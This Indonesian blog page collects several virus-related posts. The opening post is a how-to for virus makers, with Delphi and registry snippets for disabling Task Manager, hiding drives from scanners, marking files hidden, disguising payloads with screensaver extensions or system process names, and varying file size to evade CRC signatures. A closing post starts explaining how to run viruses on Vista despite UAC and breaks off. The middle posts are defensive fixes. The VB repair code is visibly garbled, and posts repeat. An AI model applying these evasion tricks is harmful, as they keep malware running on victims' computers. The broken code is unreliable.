RSS Feed (xml)
Trick VM agar Virus Susah di Basmi
Banyak cara agar virus buatanmu susah di hapus atau di berantas oleh antivirus beberapa cara yang dapat di gunakan adalah:
1.Jalankan virus yang kamu buat
Misal jika pakai Delphi tinggal tulis :
ShellExecute(0, 'open', 'C:\WINDOWS\virus.exe', nil, nil, SW_NORMAL);
//Jalankan file 'C:\WINDOWS\virus.exe' dengan tampilan aplikasi dengan window normal
Dan jika antivirus akan menghapus file tsb atau user akan menghapus file tersebut secara manual maka akan keluar pesan:
2. Tutup Task Manager
Agar file virus yang dijalankan tidak dapat dihentikan secara paksa lewat Task Manager maka Task Manager harus di kunci caranya jika di Delphi:
Reg.RootKey := HKEY_CURRENT_USER;
Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Policies\System',true);
Reg.writestring(' DisableTaskMgr ','1');
//membuat DWORD baru dengan nama DisableTaskMgr dengan nilai 1.
3. Sembunyikan drive tempat virus kamu berada
Cara ini digunakan agar virus yang terletak di Drive misal Drive C menjadi susah untuk di-scant oleh antivirus karena Drive tersebut telah di sembunyikan.
Sama seperti yang di atas buat DWORD baru dengan nama NoViewOnDrive dengan nilai 4 di HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, Juga di HKLM-nya atau dengan membuat DWORD NoDrive.
Saat mau di-scant drive c -nya tidak ada
4. Buat virusmu menjadi beratribut Hiden paling tidak teknik ini dapat menghindari dari penghapusan manual
Misal jika pakai Delphi tinggal tulis :
Windows.SetFileAttributes(PChar(Prog+'\virus.exe'),7);
//men-set atribut file bernama virus.exe yang terletak di C:\Program Files menjadi Hidden
5. Jangan membuat peranakan dengan ekstensi yang berlebihan.
Misal : virus.txt.exe ekstensi yang berlebihan ini akan di curigai oleh antivir tertentu sebagai FAKE EXTENTION
Tapi buat peranakan virus dengan exstensi-exstensi penyamaran agar susah dicari misal: SCR, PIF, COM . Extensi diatas semuanya memiliki cara akses yang sama. Meskipun terjadi perubahan extensi, virus tersebut tetap akan berjalan dengan normal. SCR digunakan virus untuk menyamar sebagai Screen Saver sehingga virus tersebut akan aktif jika Screen Saver aktif. Dan tentunya dengan melakukan sedikit perubahan pada registry agar virus tersebut menjadi Default pada Screen Saver.
6. Buat peranakan dengan nama yang hampir sama dengan file system
Agar penyamaran sukses virus juga menggunakan penamaan yang hampir sama dengan file system atau bahkan memang sama hanya saja lokasi file tersebut yang berbeda. Penamaan file yang sering digunakan virus pada system: winlogon.exe,lsass.exe, services.exe,csrss.exe,smss.exe,svchost.exe, System,taskmgr.exe, explorer.exe. Dengan menggunakan penamaan file seperti itu. Virus tersebut dapat membuat bingung orang yang terserang virus tersebut karena mereka tidak tahu apakah file tersebut benar-benar file system yang asli atau yang palsu (virus). Penamaan file yang bermasalah pada task manager adalah winlogon.exe,lsass.exe, services.exe, csrss.exe, smss.exe. Karena file tersebut justru akan dilindungi oleh task manager sehingga tidak dapat matikan prosesnya oleh task manager.
7. Jangan menggunakan icon virus dengan file folder warna kuning karena sudah di curigai oleh antivir tertentu .
8. Buat peranakan virus dengan ukuran yang bervariasi.
Hal ini dilakukan agar antivirus kesusahan dalam mencari string crc dari peranakan virus tersebut karena ukuran yang bervariasi maka crc dari peranakan virus tersebut juga bervariasi dengan demikian peranakan virus tersebut dapat lolos dari pelacakan antivirus.
Atau bisa juga dengan membuat virus yang mempunyai peranakan virus dengan jenis lain misal peranakannya adalah virus VBScript ,dengan demikian maka crc virus peranakan tidak akan sama dengan crc virus induknya.
Dah dulu saran2 dari vm semoga dapat menambah imajenasi para vm
Untuk download tutorial ini:
http://www.4shared.com/file/65824491/7d90c10c/VirusSusahdiBasmi.html
Tidak bisa menginstall karena virus???
Tidak bisa menginstall karena virus???
Yah, sekedar iseng-iseng bikin artikel. Soalnya mungkin ada sebagian orang yang ngerasa bosan kalo terus-terusan artikel Morphic membahas analisis virus dan Morphost. Untuk kali ini saya tidak membahas analisis virus dan Morphost melainkan efek-efek virus. Salah satunya kenapa tidak bisa menginstall saat kena virus.
Banyak faktor kenapa gak bisa menginstall. Salah satu mungkin karena service Windows Installer di komputermu sudah didisable oleh si virus.
Waktu kita menginstal muncul gambar di bawah ini:
Yang tadinya kita pengen nginstal antivirus, kita jadi gak bisa deh… Padahal kita tadi pengen bersihin komputer kita pake antivirus ( Morphost juga antivirus loh).
Artikel kali ini gak usah panjang-panjang. Saya akan jelaskan bagaimana mengenablenya. (Artikel ini khusus bagi orang yang belum tahu! Bagi yang sudah tahu, dilarang keras!!!!!!!)
Caranya:
Buka Start lalu klik Run
Pada kotak dialog Run ketik “services.msc”
Ooops muncul pertanyaan! Bagaimana kalo komputer kita itu fungsi run-nya didisable alias gak berfungsi?
Oke! Caranya buka control Panel! Lalu buka “Administrative tools” dan buka “services”
Ooops Muncul pertanyaan lagi! Bagaimana kalo control panel gak bisa dibuka?
Yah, caranya buka file “C:\windows\system32\services.msc”
Terakhir akan muncul gambar dibawah ini:
Terus Cari yang namanya “Windows Installer”
Lalu double klik pada services yang namanya “Windows Installer” hingga muncul gambar dibawah ini:
Lalu pada startup type terdapat tulisan “Disabled”. Nah, sekarang tugas kita mengganti tulisan itu menjadi “Automatic” atau “Manual”
Terserah mau ganti jadi apa asalkan bukan ”Disabled”
LALU KLIK OK!!!!!!!!!!!!!!!!!!!!
Yap, sekarang dah selesai.
Sekian tutorial saya yang gak ada apa-apanya ini yah.
Yah, sekedar iseng-iseng bikin artikel. Soalnya mungkin ada sebagian orang yang ngerasa bosan kalo terus-terusan artikel Morphic membahas analisis virus dan Morphost. Untuk kali ini saya tidak membahas analisis virus dan Morphost melainkan efek-efek virus. Salah satunya kenapa tidak bisa menginstall saat kena virus.
Banyak faktor kenapa gak bisa menginstall. Salah satu mungkin karena service Windows Installer di komputermu sudah didisable oleh si virus.
Waktu kita menginstal muncul gambar di bawah ini:
Yang tadinya kita pengen nginstal antivirus, kita jadi gak bisa deh… Padahal kita tadi pengen bersihin komputer kita pake antivirus (
Artikel kali ini gak usah panjang-panjang. Saya akan jelaskan bagaimana mengenablenya. (Artikel ini khusus bagi orang yang belum tahu! Bagi yang sudah tahu, dilarang keras!!!!!!!)
Caranya:
Buka Start lalu klik Run
Pada kotak dialog Run ketik “services.msc”
Ooops muncul pertanyaan! Bagaimana kalo komputer kita itu fungsi run-nya didisable alias gak berfungsi?
Oke! Caranya buka control Panel! Lalu buka “Administrative tools” dan buka “services”
Ooops Muncul pertanyaan lagi! Bagaimana kalo control panel gak bisa dibuka?
Yah, caranya buka file “C:\windows\system32\services.msc”
Terakhir akan muncul gambar dibawah ini:
Terus Cari yang namanya “Windows Installer”
Lalu double klik pada services yang namanya “Windows Installer” hingga muncul gambar dibawah ini:
Lalu pada startup type terdapat tulisan “Disabled”. Nah, sekarang tugas kita mengganti tulisan itu menjadi “Automatic” atau “Manual”
Terserah mau ganti jadi apa asalkan bukan ”Disabled”
LALU KLIK OK!!!!!!!!!!!!!!!!!!!!
Yap, sekarang dah selesai.
Sekian tutorial saya yang gak ada apa-apanya ini yah.
VIRUS & INTERNET
K lo membicarakan tentang virus pasti kita juga akan membicarakan internet, Mengapa? Karena kebanyakan virus yang telah beradaptasi dengan dunia menggunakan internet sebagai media penyebarannya, tidak hanya menggunakan media penyebaran floppy atau flashdisk seperti yang telah dilakukan pada virus-virus lokal kebanyakan.
Banyak virus yang menyebarkan dirinya lewat internet misalnya: W32/Emmareg.A yang mecoba menyebar melalui email dengan mengirimkan [reply] semua email yang ada di INBOX dengan menyertakan attachment NOVA.SCR. W32/VBWorm.MLG yang memalsukan diri sebagai PCMAV antivirus RC9 meminta kita untuk percaya dan mendownload virus tersebut. W32/Viking.GU yang mengakibatkan traffic jaringan menjadi padat hal ini dikarenakan Viking mencoba untuk melakukan ping request dengan melakukan scan terhadap semua IP yang terdapat dalam subnet lokal yang ada di dalam jaringan tersebut hal ini ditambah lagi dengan aksi lainnya dengan mencoba untuk mengkopikan dirinya ke komputer target serta menginfeksi file yang mempunyai ekstensi EXE.
Baru-baru ini saja ada virus Anjelina Jolie(W32/Agent.GPKB) yang mengirimkan e-mail berisi tawaran untuk memperoleh video syur FREE alias Gratis dengan embel-embel seakan-akan email tersebut merupakan Fitur dari Microsoft MSN. Lalu versi ke 2 dari virus Anjelina Jolie ini yaitu Anjelina Jolie II (W32/ DLoader.ITOA ) yang akan memalsukan isi berita dari CNN dan MSNBC . Virus ini dikategorikan sebagai Spyware dan mempunyai ciri-ciri yang tidak jauh dengan pendahulunya (Agent.GPKB), virus ini juga akan men- download sebuah program lain sama seperti pendahulunya yakni antivirus XP 2008 yang secara otomatis akan langsung di install di komputer korban . Anjelina Jolie II ini menyebarkan email dari Daily Top 10 dengan subject CNN.comDaily Top 10, harap berhati-hati apalagi jika diminta untuk download sebuah file dengan nama get_flash_update.exe pada saat anda klik salah satu berita dalam bentuk vidoe yang di sertakan pada email tersebut .
Saat saya lagi main-main ke warnet untuk mencari suasana sambil memandangi kecantikan penjaga warnetnya ternyata saya pulang dengan membawa oleh-oleh sebuah file.vbs yang berisi kode-kode untuk menggandakan diri dan menyebarkan dirinya melalui internet koding penyebaran internetnya dapat dilihat pada gambar berikut:
Dari kode diatas dapat saya tarik kesimpulan bahwa virus ini akan membuat suatu file bernama script.ini yang berfungsi memasuki channel yang telah diketahui dan mengirimkan nick berupa nama dari virus tersebut. Kode tersebut sangat terlihat bahwa virus ini menyebarkan diri lewat internet (khusunya IRC).
Mengapa memilih IRC sebagai media penyebarannya? Karena IRC memiliki kelebihan penulisan perintah-perintah DCC. File tersebut di set secara automatic sehingga virus tersebut dapat diantar melalui DCC.
IRC mempunyai sistem untuk menerima atau menolak file yaitu dengan menuliskan perintah /dccallow +nama pengantar, yang akan membenarkan anda menerima file itu. Oleh karena penyebaran virus tiap- tiap hari di DALnet, DALnet mempunyai satu fungsi yang membatas penghantaran DCC bagi fail dengan koneksi ("js", "pl","exe", "com", "bat", "dll", "ini", "vbs", "pif", "mrc", "scr", "doc", "xls", "lnk", "shs", "htm", "html"). Untuk mendapatkan file tersebut, Unit Kod DALnet telah menambahkan perintah DCCallow. Perintah DCCallow ,yaitu dengan menuliskan
Syntax: /quote dccallow +/-nickname,Informasi: +/-nama_samaran mesti dinyatakan untuk anda menyatakan siapa yang anda izinkan menghantar DCC kepada anda. Jadi anda dapat menentukan sendiri orang-orang yang anda percaya dalam mengirimkan file.
Jika anda menggunakan IRC, Kerap kali anda akan mengalami masalah pengguna IRC yang mencoba menghantar file virus dan trojan. File- file tersebut misalnya Movie.avi.pif, Links.vbs dll. Ada juga file berupa 'backdoors'.Jika file tersebut dipanggil, ia bisa memberi laluan tanpa izin kepada pengguna yang tidak bertanggung jawab untuk meng-exploit dan dan merusak komputer anda.
Anda hanya bisa mengatasi masalah ini dengan menetapkan opsyen DCC anda kepada 'ignore'.
Dengan melihat file mirc.ini yang berisi daftar file yang diterima(lolos) ataupun yang ditolak(tidak diloloskan) seorang virus_maker(vm) yang biasa mencari celah-celah keamanan pun dapat membuat duplikat dari file ini dengan menambah daftar file yang diterima(lolos) dengan ekstensi-ekstensi virus buatannya misal dalam daftar accept ditambah dengan*.exe,*.vbs
Sehingga serangan dari virus_maker akan berjalan jauh lebih lancar dengan dibukanya celah tersebut
Dan saran dari ku buat penguna IRC,Jangan terima fail DCC dari orang yang tidak anda kenal,karna orang yang tidak anda kenal, atau tidak anda percaya tersebut bisa saja memberikan file berisi virus atau trojan.
Seperti tidak mau kalah rieysha juga membuat virus yang berjalan di IRC virus ini di buat dengan delphi.
Intinya sama dengan virus .vbs diawal yaitu virus akan membuat suatu file bernama script.ini yang berfungsi memasuki channel yang telah diketahui dan mengirimkan nick berupa nama dari virus tersebut dan menjalankan file virus tersebut (perintah run)
Sekali lagi saya ingatkan virus hanyalah program biasa bikinan manusia biasa, dengan selalu berhati-hati dan melakukan pencegahan-pencegahan anda yang jauh lebih pintar pasti tidak akan gentar menghadapinya hehehehe…
Sekian dulu..
untuk download tutorial
http://www.4shared.com/file/62427129/36a40305/VIRUSdanINTERNET.html
MEMBUAT PROGRAM UNTUK MEMATIKAN AUTORUN
Akhir akhir ini perkembangan virus di indonesia semakin pesat, saat ini pemicu aktifnya sebuah virus-pun sudah mulai berkembang, hal ini membuat sebagian orang merasa kurang nyaman dalam beraktifitas dengan komputernya terutama temen2 yang amat sangat terbiasa menggunakan Flash Disk, oleh karenanya pada artikel kali ini saya akan membahas mengenai cara MEMATIKAN PROSES AUTORUN pada windows dengan beberapa cara, hal ini bisa dijadikan sebagai langkah pertama dalam memblock serangan virus, ok langsung aja….
CARA 1 DENGAN MENGGUNAKAN INNO SETUP CREATOR
1. Siapkan program Inno Setup Creator, program ini bisa di download pada http//:www.innosetup.com/.
2. Pada tampilan awal program (tab Welcome) pilih “Create a new empty script file”
3. Kemudian Copy script berikut :
; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!
[Setup]
AppName=KillAutorun
AppVerName=KillAutorun 1.1
AppPublisher=Rhiyho, Inc.
CreateAppDir=no
OutputBaseFilename=setup
Compression=lzma
SolidCompression=yes
[Registry]
Root: HKLM; Subkey: "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"; Valuetype: dword; Valuename: "NoDriveTypeAutoRun"; Valuedata: "124" ; flags: deletevalue
Root: HKCU; Subkey: "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"; Valuetype: dword; Valuename: "ShowSuperHidden"; Valuedata: "1" ; flags: deletevalue
[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"
4. Save di my documents
5. Kemudian pilih menu Build – Compile, atau kita dapat langsung menggunakan Ctrl+F9, hasil dari program tersebut akan tersimpan pada folder my documents dengan direktori Output dengan nama file setup.exe.
6. Jalankan file setup.exe
CARA 2 DENGAN MENGGUNAKAN BATCH FILE
1. Bukalah sebuah Notepad
2. Kemudian copylah script berikut :
ECHO OFF
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 124 /f
REG ADD HKCU \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
CLS
ECHO KillAutorun
ECHO -----------
ECHO Copyright (c) 2007 [strider_rhiyho]
ECHO Komputer akan direstart untuk normalisasi
ECHO Simpan terlebih dahulu semua data yang dianggap penting
PAUSE
SHUTDOWN -r -f -t 00
3. Simpan file tersebut dengan ekstensi .bat
4. Coba di running.
Saran : untuk merubah file berekstensi .bat menjadi .exe bisa menggunakan program Bat2exe.exe, program bisa didownload dari alamat www.f2ko.de
CARA 3 DENGAN LANGSUNG MERUBAH PADA REGISTRY EDITOR
1. Bukalah sebuah jendela registry editor
2. Pilih My Computer\HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Kemudian pilih Menu Edit – New – DWORD Value
4. Ubah Namanya menjadi NoDriveTypeAutoRun
5. Beri nilai 124 dan pilih Decimal, atau beri nilai 7c dan kita pilih Hexadecimal.
6. Pilih My Computer\HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Explorer\Advanced
7. Cari Value dengan nama ShowSuperHidden
8. Ubah nilainya menjadi 1
9. Bila Value tersebut belum ada buat value baru dengan memilih Menu Edit – New – DWORD Value
10. Ubah namanya menjadi ShowSuperHidden dan beri nilai 1.
Semua cara di atas akan menghasilkan :
1. Matinya proses Autorun di setiap drive
2. Semua file dengan attribute Super Hidden akan ditampikan (biasanya virus akan merubah attribute dirinya menjadi super hidden).
3. Cara diatas hanya digunakan untuk pencegahan awal dalam memblock serangan virus
Yupz… kayanya itu aja, sebelumnya saya mohon maaf jika sebelumnya ternyata sudah ada yang membuat artikel dengan topic yang sama, n_n , artikel ini dimaksudkan untuk menjawab pertanyaan teman teman beberapa waktu lalu, oia satu lagi kalo udah di running sebaiknya komputernya di restart.
Thank’s to : Temen2 TheRentHome, kapan kapan kita main “Hokage” lagi oce… dan semua temen2 NetralComunity yang tetep setia jadi WhiteHat
Semoga program di atas dapat bermafaat bagi kita semuanya… amin
CARA 1 DENGAN MENGGUNAKAN INNO SETUP CREATOR
1. Siapkan program Inno Setup Creator, program ini bisa di download pada http//:www.innosetup.com/.
2. Pada tampilan awal program (tab Welcome) pilih “Create a new empty script file”
3. Kemudian Copy script berikut :
; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!
[Setup]
AppName=KillAutorun
AppVerName=KillAutorun 1.1
AppPublisher=Rhiyho, Inc.
CreateAppDir=no
OutputBaseFilename=setup
Compression=lzma
SolidCompression=yes
[Registry]
Root: HKLM; Subkey: "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"; Valuetype: dword; Valuename: "NoDriveTypeAutoRun"; Valuedata: "124" ; flags: deletevalue
Root: HKCU; Subkey: "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"; Valuetype: dword; Valuename: "ShowSuperHidden"; Valuedata: "1" ; flags: deletevalue
[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"
4. Save di my documents
5. Kemudian pilih menu Build – Compile, atau kita dapat langsung menggunakan Ctrl+F9, hasil dari program tersebut akan tersimpan pada folder my documents dengan direktori Output dengan nama file setup.exe.
6. Jalankan file setup.exe
CARA 2 DENGAN MENGGUNAKAN BATCH FILE
1. Bukalah sebuah Notepad
2. Kemudian copylah script berikut :
ECHO OFF
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 124 /f
REG ADD HKCU \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
CLS
ECHO KillAutorun
ECHO -----------
ECHO Copyright (c) 2007 [strider_rhiyho]
ECHO Komputer akan direstart untuk normalisasi
ECHO Simpan terlebih dahulu semua data yang dianggap penting
PAUSE
SHUTDOWN -r -f -t 00
3. Simpan file tersebut dengan ekstensi .bat
4. Coba di running.
Saran : untuk merubah file berekstensi .bat menjadi .exe bisa menggunakan program Bat2exe.exe, program bisa didownload dari alamat www.f2ko.de
CARA 3 DENGAN LANGSUNG MERUBAH PADA REGISTRY EDITOR
1. Bukalah sebuah jendela registry editor
2. Pilih My Computer\HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Kemudian pilih Menu Edit – New – DWORD Value
4. Ubah Namanya menjadi NoDriveTypeAutoRun
5. Beri nilai 124 dan pilih Decimal, atau beri nilai 7c dan kita pilih Hexadecimal.
6. Pilih My Computer\HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Explorer\Advanced
7. Cari Value dengan nama ShowSuperHidden
8. Ubah nilainya menjadi 1
9. Bila Value tersebut belum ada buat value baru dengan memilih Menu Edit – New – DWORD Value
10. Ubah namanya menjadi ShowSuperHidden dan beri nilai 1.
Semua cara di atas akan menghasilkan :
1. Matinya proses Autorun di setiap drive
2. Semua file dengan attribute Super Hidden akan ditampikan (biasanya virus akan merubah attribute dirinya menjadi super hidden).
3. Cara diatas hanya digunakan untuk pencegahan awal dalam memblock serangan virus
Yupz… kayanya itu aja, sebelumnya saya mohon maaf jika sebelumnya ternyata sudah ada yang membuat artikel dengan topic yang sama, n_n , artikel ini dimaksudkan untuk menjawab pertanyaan teman teman beberapa waktu lalu, oia satu lagi kalo udah di running sebaiknya komputernya di restart.
Thank’s to : Temen2 TheRentHome, kapan kapan kita main “Hokage” lagi oce… dan semua temen2 NetralComunity yang tetep setia jadi WhiteHat
Semoga program di atas dapat bermafaat bagi kita semuanya… amin
Membuat Fix File untuk MS Word dan MS ExceL Sendiri Pakek VB (duh vb Lagih...)
Yups.... kali ini judulnya seperti ituwh..... yaaaaaa... biar semua orang bisa membuat tools nya masing - masing... jadi...semua orang gka perlu lagi teriak - teriak minta tulung karena ada virus yang merusak data MS word n excel .. atau kagol karena data skripsi and kerjaannya dirusak ... geheheheheheh!!!!!!yaaaaaa mau gimana...terkadang seorang yang ada di cyber ini tidak semuanya WARAS (kata gildas deograt a.k.a founder security-1st dan KKI (Komunitas Keamanan Indonesia)) ... makanya kita juga kudu nguasain cara membuat tools agar file yang kita sayangi tidaklah musnah ... (bahasanya nak nak...) .... satu lagi... disini akan dilepas sak source kodenya.... LOh kenapa???Salah gue lagih????gak sih...lagian kode itu bukan buatan saya murni, walaupun buatan saya murni tetep saya lepas... Paling tidak sekarang kita BELAJAR MENGHARGAI HASIL KARYA ORANG LAIN... iyah...terkadang yang namanya source code gratis ini dipakai oleh kita untuk bermacam - macam kepentingan ... entah kepentingan agar diliat orang bisa programming, padahala source code tersebut bukan buatan kita 100 persen, eh ngaku2 ke orang ...INILAH BUATAN KITAAAAAA...biar semua orang tau kalau kita ini paling jago buat program....naaaaaaaa...itulah salah kaprahnya...giliran lagu kita dibajak...kita teriak2 EHHHHHHH ITU LAGU SAYAAAAAAAAAAAAAAA ... gehahahahhaha!!!ya mungkin namanya karma yah...kalo kita membajak ya kita bakal dibajak jugak ... tapi terlepas dari itu virologi hanya mengajak HARGAILAH HASIL KARYA ORANG LAIN... 
Okay... sekarang kita akan membuat fix tools untuk menyembuhkan sakit karena virus:
WM/VB.BG (terdeteksi oleh Antivir)
Trojan Backdoor Generic6.GMX (terdeteksi oleh AVG)
Backdoor.Delf (terdeteksi oleh Norton Anti Virus)
TR/Drop.Loops.A.1 (terdeteksi oleh Antivir)
w32/delf.cd worm (terdeteksi oleh Avira)
Inti dari perbaikan file ini ada 3 yaitu:
- Mendeteksi Ukuran File
- Memotong badan file yang berisi virus
- Menyimpan file yang telah jadi
seperti penjelasan di artikel sebelumnya, ukuran virus yang menempel di badan file sehat itu adalah 331299 byte, untuk itu kita akan melakukan pendeletan virus yang menyisip di file tersebut, caranya ... buka visual basic, atau alat andalan utnuk membuat tools (soalnya bisanya itu aja seh....hahahaha)...
MENDETEKSI UKURAN FIE
untuk dapat menjalankan fungsi pendeteksian file, cukup ketik fungsi BytesInBytes di bawah ini...
Function BytesInBytes(bIn() As Byte, bFind() As Byte, startPosn As Long) As Long
Dim I, iFinal, iLimit, xLimit, uIn, uFind As Long '2GB limit
Dim X As Integer
uFind = UBound(bFind)
iLimit = UBound(bIn) - uFind + 1
xLimit = uFind - 1
uIn = UBound(bIn)
For I = startPosn To iLimit
For X = 0 To xLimit
If I + X <= uIn Then If bIn(I + X) <> bFind(X + 1) Then Exit For
If X + 1 = uFind Then
iFinal = BytesInBytes(bIn, bFind, I + 1)
If iFinal > I Then I = iFinal
BytesInBytes = I
Exit Function
End If
End If
Next X
Next I
BytesInBytes = -1
End Function
MEMOTONG BAGIAN VIRUS YANG MENEMPEL DI FILE
Untuk dapat memotong virus tersebut, cukup ketikkan kode di bawah ini:
Private Sub CutPaste(OP As Boolean, PasteBytes() As Byte)
'TRUE=Cut..FALSE=Paste
SL = 331299 '662598 '331299
If SFP >= 0 Or SL > 0 Then
Dim nBytes As Long
Dim I As Long
If OP = False Then 'Paste
nBytes = UBound(PasteBytes)
ReDim Preserve WorkSpace(1 To FL + nBytes)
' Move the bytes DOWN in the Array--Dest,Src,Bytes to move
If FL - SFP > 0 Then Call CopyMemory(ByVal VarPtr(WorkSpace(nBytes + SFP + 1)), ByVal VarPtr(WorkSpace(SFP + 1)), FL - SFP)
' Copy the selected data to the Array--Dest,Src,Bytes to move
Call CopyMemory(ByVal VarPtr(WorkSpace(SFP + 1)), PasteBytes(1), nBytes)
FL = FL + nBytes
Else 'Cut
If FL - SL > 0 Then
' Move the Data UP in the Array--Dest,Src,Bytes to move
If FL - (SL + SFP) > 0 Then Call CopyMemory(ByVal VarPtr(WorkSpace(SFP + 1)), ByVal VarPtr(WorkSpace(SL + SFP + 1)), FL - (SL + SFP))
FL = FL - SL
ReDim Preserve WorkSpace(1 To FL)
Else
ReDim WorkSpace(1 To 1)
FL = 1
End If
End If
If FF > FL Then FF = FL
If FF < ff =" 0" value =" True" fname =" Left(CommonDialog1.FileName," value =" True" fname =" Left(CommonDialog1.FileName," fnum =" FreeFile" openfilename =" Fname" fl =" FSO.GetFile(OpenFileName).Size"> 32755 Then MsgBox (Error & vbCr & vbCr & "Error Number: " & Str(Err)), vbCritical, "! ERROR !"
End Sub
File yang dibersihkan akan disimpan sesuai nama file dan extensinya, tapi nama file-nya ditambahi judul "_fix" gitu untuk membedakan file yang sakit dan yang sehat...
nah mudah bukan??? ..... berikut saya sertakan source code dan program installer untuk yang tidak bisa membuka file .exe nya ... okay ...
DOWNLOAD SOURCECODE FIXFILE
DOWNLOAD INSTALLER
HAPPY CODING
Okay... sekarang kita akan membuat fix tools untuk menyembuhkan sakit karena virus:
WM/VB.BG (terdeteksi oleh Antivir)
Trojan Backdoor Generic6.GMX (terdeteksi oleh AVG)
Backdoor.Delf (terdeteksi oleh Norton Anti Virus)
TR/Drop.Loops.A.1 (terdeteksi oleh Antivir)
w32/delf.cd worm (terdeteksi oleh Avira)
Inti dari perbaikan file ini ada 3 yaitu:
- Mendeteksi Ukuran File
- Memotong badan file yang berisi virus
- Menyimpan file yang telah jadi
seperti penjelasan di artikel sebelumnya, ukuran virus yang menempel di badan file sehat itu adalah 331299 byte, untuk itu kita akan melakukan pendeletan virus yang menyisip di file tersebut, caranya ... buka visual basic, atau alat andalan utnuk membuat tools (soalnya bisanya itu aja seh....hahahaha)...
MENDETEKSI UKURAN FIE
untuk dapat menjalankan fungsi pendeteksian file, cukup ketik fungsi BytesInBytes di bawah ini...
Function BytesInBytes(bIn() As Byte, bFind() As Byte, startPosn As Long) As Long
Dim I, iFinal, iLimit, xLimit, uIn, uFind As Long '2GB limit
Dim X As Integer
uFind = UBound(bFind)
iLimit = UBound(bIn) - uFind + 1
xLimit = uFind - 1
uIn = UBound(bIn)
For I = startPosn To iLimit
For X = 0 To xLimit
If I + X <= uIn Then If bIn(I + X) <> bFind(X + 1) Then Exit For
If X + 1 = uFind Then
iFinal = BytesInBytes(bIn, bFind, I + 1)
If iFinal > I Then I = iFinal
BytesInBytes = I
Exit Function
End If
End If
Next X
Next I
BytesInBytes = -1
End Function
MEMOTONG BAGIAN VIRUS YANG MENEMPEL DI FILE
Untuk dapat memotong virus tersebut, cukup ketikkan kode di bawah ini:
Private Sub CutPaste(OP As Boolean, PasteBytes() As Byte)
'TRUE=Cut..FALSE=Paste
SL = 331299 '662598 '331299
If SFP >= 0 Or SL > 0 Then
Dim nBytes As Long
Dim I As Long
If OP = False Then 'Paste
nBytes = UBound(PasteBytes)
ReDim Preserve WorkSpace(1 To FL + nBytes)
' Move the bytes DOWN in the Array--Dest,Src,Bytes to move
If FL - SFP > 0 Then Call CopyMemory(ByVal VarPtr(WorkSpace(nBytes + SFP + 1)), ByVal VarPtr(WorkSpace(SFP + 1)), FL - SFP)
' Copy the selected data to the Array--Dest,Src,Bytes to move
Call CopyMemory(ByVal VarPtr(WorkSpace(SFP + 1)), PasteBytes(1), nBytes)
FL = FL + nBytes
Else 'Cut
If FL - SL > 0 Then
' Move the Data UP in the Array--Dest,Src,Bytes to move
If FL - (SL + SFP) > 0 Then Call CopyMemory(ByVal VarPtr(WorkSpace(SFP + 1)), ByVal VarPtr(WorkSpace(SL + SFP + 1)), FL - (SL + SFP))
FL = FL - SL
ReDim Preserve WorkSpace(1 To FL)
Else
ReDim WorkSpace(1 To 1)
FL = 1
End If
End If
If FF > FL Then FF = FL
If FF < ff =" 0" value =" True" fname =" Left(CommonDialog1.FileName," value =" True" fname =" Left(CommonDialog1.FileName," fnum =" FreeFile" openfilename =" Fname" fl =" FSO.GetFile(OpenFileName).Size"> 32755 Then MsgBox (Error & vbCr & vbCr & "Error Number: " & Str(Err)), vbCritical, "! ERROR !"
End Sub
File yang dibersihkan akan disimpan sesuai nama file dan extensinya, tapi nama file-nya ditambahi judul "_fix" gitu untuk membedakan file yang sakit dan yang sehat...
nah mudah bukan??? ..... berikut saya sertakan source code dan program installer untuk yang tidak bisa membuka file .exe nya ... okay ...
DOWNLOAD SOURCECODE FIXFILE
DOWNLOAD INSTALLER
HAPPY CODING
membuat virus vista
Hello..hello… sudah lama saya gak sharing ilmu disini. Sekarang saya akan kasih konsep pembuatan virus yang akan berjalan di OS Windows Vista. Wuih! Vista kan keamanannya kuat banget. Kok bisa sih virus jalan di Vista? Ini nih tekniknya.
Konsep ini sebenarnya sangat sederhana. Saya yakin banyak yang mengetahui konsep ini namun tidak sadar mereka telah mengetahuinya. Memang apa sih konsepnya?
Pada dasarnya virus yang bisa berjalan di XP sebenarnya juga dapat berjalan di Vista. Lho kok? Iya, struktur sistem di Vista sebenarnya mirip dengan XP. Hanya saja di OS Windows Vista ditambahkan komponen yang tidak terdapat di XP. Komponen tambahannya cenderung yang mencondong ke arah keamanan. Salah satu yang paling menonjol adalah adanya fitur User Account Control.
USER ACCOUNT CONTROL?
Saya yakin kalian sudah tidak asing lagi mendengar fitur ini. User Account Control atau yang sering disingkat UAC adalah fitur keamanan andalan Vista. UAC akan membatasi hak akses User dalam menjalankan sebuah program. Bahkan account yang berkedudukan sebagai administrator sendiri juga akan diberlakukan Limited User Acces (LUA) yang dikontrol dengan UAC.
Sebuah program yang berjalan di Windows Vista tidak bisa mengubah konfigurasi sistem seenaknya tanpa izin dari User. Bahkan membuat folder, me-rename file dan memindahkan file di folder Program Files dan folder Windows saja tidak bisa dilakukan oleh sebuah program apabila tidak mendapat izin langsung dari User. Hal ini dikarenakan program-program tersebut akan difilter oleh UAC.
